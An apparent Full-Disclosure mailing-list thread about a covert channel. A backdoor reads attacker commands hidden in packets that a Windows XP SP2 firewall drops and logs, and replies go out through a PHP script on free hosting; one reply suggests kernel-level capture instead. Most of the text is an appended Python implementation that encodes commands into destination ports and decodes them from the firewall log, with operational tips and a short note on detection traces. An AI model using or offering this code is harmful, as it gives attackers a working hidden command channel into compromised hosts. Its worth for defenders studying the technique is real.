If you have system access, why not capture packets at kernel level, BEFORE they reach the firewall? Your approach seems to be very noisy ;)
PASTOR ADRIAN wrote:
> Some time ago I thought of the following idea for a covert channel.
it would be better to intercept packets at kernel level BEFORE they
> Although the idea of covert channels is *not* new at all, I couldn't
> find anything in Google related to the following method of implementing
> a covert channel.
>
> The scenario is the following. The victim is a host with a host-level
> firewall which is blocking *all* incoming traffic. Somehow the attacker
> still needs to communicate with a backdoor planted in this host. Use a
> reverse shell and job done, you might say.
> Actually, there is another way which I thought would be more creative
> (IMHO).
>
> It works like this: the backdoor enables logging in the host-level
> firewall for all dropped packets, say Windows XP SP2 Firewall. Then the
> backdoor receives commands from the attacker by interpreting the
> properties of the dropped packets which were logged by the firewall. In
> other words, the backdoor is constantly reading the logs and parsing
> commands which were sent by the attacker embedded in packets which are
> being dropped (but logged) by the firewall.
>
> attacker sends packets -> packets are dropped by firewall -> packets
> properties are captured in logs -> backdoor reads logs and finds
> encoded commands -> commands are executed
>
> Now, for the way the backdoor would reply back to the victim is really
> up to you. One method that comes to my mind is by posting the responses
> to a PHP script which is located in some free-hosting webpage. The
> attacker would then access this webpage.
>
> Please, if you know anything related to backdoors intercepting commands
> from log files send me some links. Ideas, comments and flames are more
> than welcome :-) .
>
> Regards,
> pagvac (Adrian Pastor)
> Earth, SOLAR SYSTEM
> www.adrianpv.com <http://www.adrianpv.com>
> www.ikwt.com <http://www.ikwt.com> (In Knowledge We Trust)
>
> ------------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 
_____________________________________________________
~ DI (FH) Bernhard Mueller
~ IT Security Consultant
~ SEC-Consult Unternehmensberatung GmbH
~ www.sec-consult.com
~ A-1080 Wien Blindengasse 3
~ Tel: +43/676/840301718
~ Fax: +43/(0)1/4090307-590
______________________________________________________
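The channel the quoted post describes, worked through end to end as an added example (this is not code from either poster): the attacker encodes a command into packets that the host firewall will drop, and the backdoor recovers it from the firewall's drop log. The post does not fix an encoding, so the scheme here is an assumption: one TCP SYN per command byte, with the destination port carrying a sequence number and the byte, and a NUL byte closing each command. The log lines are constructed to follow the W3C-style layout of a Windows XP SP2 pfirewall.log (a `#Fields:` header naming the columns, space-separated values, `-` for empty fields); the IP addresses are placeholders.

```python
# Added example: port-encoded covert channel over the host firewall's drop log.
# Encoding scheme and sample log lines are assumptions of this example, not
# taken from the original post.
import random
from typing import Dict, Iterable, List

PORT_BASE = 1024                       # keep encoded ports above the privileged range
MAX_SEQ = (65535 - PORT_BASE) >> 8     # 251: highest sequence number that still fits in a port
TERMINATOR = 0                         # NUL byte closes one command

# Constructed header in the layout Windows XP SP2 writes to pfirewall.log.
PFIREWALL_HEADER = [
    "#Version: 1.5",
    "#Software: Microsoft Windows Firewall",
    "#Time Format: Local",
    "#Fields: date time action protocol src-ip dst-ip src-port dst-port size "
    "tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path",
]


def encode_command(cmd: str, start_seq: int = 0) -> List[int]:
    """Attacker side: one SYN per byte (plus terminator).
    dst-port = PORT_BASE + (seq << 8 | byte), so a single port carries both the
    payload byte and a sequence number that survives reordering in the log."""
    data = cmd.encode() + bytes([TERMINATOR])
    if start_seq + len(data) - 1 > MAX_SEQ:
        raise ValueError("command does not fit in one port-encoded burst")
    return [PORT_BASE + ((start_seq + i) << 8) + b for i, b in enumerate(data)]


def render_log(ports: List[int], attacker_ip: str, victim_ip: str) -> List[str]:
    """Constructed pfirewall.log lines for dropped inbound SYNs (sample data for
    this example; a real log differs in timestamps, sizes and TCP fields)."""
    lines = list(PFIREWALL_HEADER)
    for i, port in enumerate(ports):
        lines.append(
            f"2006-02-01 12:00:{i % 60:02d} DROP TCP {attacker_ip} {victim_ip} "
            f"{40000 + i} {port} 48 S 1000{i} 0 65535 - - - RECEIVE"
        )
    return lines


def parse_pfirewall_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Map each data line to a dict keyed by the '#Fields:' column names.
    Comment lines, lines before the header and truncated lines are skipped."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or not fields:
            continue
        values = line.split()
        if len(values) != len(fields):
            continue  # partially written line (the firewall may be mid-write); do not guess
        records.append(dict(zip(fields, values)))
    return records


def decode_commands(records: List[Dict[str, str]], attacker_ip: str) -> List[str]:
    """Backdoor side: keep inbound TCP packets from the attacker that were
    DROPped, rebuild the byte stream by sequence number and split it into
    commands at each terminator. A command whose terminator has not been
    logged yet stays pending instead of being executed half-read."""
    slots: Dict[int, int] = {}
    for r in records:
        if (r.get("action"), r.get("protocol"), r.get("src-ip"), r.get("path")) != \
                ("DROP", "TCP", attacker_ip, "RECEIVE"):
            continue
        try:
            port = int(r["dst-port"])
        except (KeyError, ValueError):
            continue
        if not PORT_BASE <= port <= 65535:
            continue
        seq, byte = divmod(port - PORT_BASE, 256)
        slots.setdefault(seq, byte)  # first sighting wins; a replayed packet cannot rewrite a byte
    commands, buf, seq = [], bytearray(), 0
    while seq in slots:              # stop at the first gap: one lost packet stalls decoding
        b = slots[seq]
        seq += 1
        if b == TERMINATOR:
            commands.append(buf.decode(errors="replace"))
            buf = bytearray()
        else:
            buf.append(b)
    return commands


if __name__ == "__main__":
    attacker, victim = "10.0.0.5", "10.0.0.7"   # placeholder addresses
    burst1 = encode_command("id")
    burst2 = encode_command("uname -a", start_seq=len(burst1))
    ports = burst1 + burst2
    random.shuffle(ports)                       # log order need not match send order
    recs = parse_pfirewall_log(render_log(ports, attacker, victim))
    print(decode_commands(recs, attacker))      # ['id', 'uname -a']
```

Two operational points follow from the code rather than from the post. The backdoor only ever sees what the firewall chooses to log, so it has to tolerate reordering and partially written lines, and it cannot distinguish a lost packet from one not yet flushed to disk, which is why decoding stops at the first gap. On the defensive side, the channel leaves two durable traces on the host: the firewall logging setting being switched on by something other than an administrator, and a process repeatedly reading the drop log; both are far easier to alert on than the packets themselves, which is the noise Bernhard's reply is pointing at.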
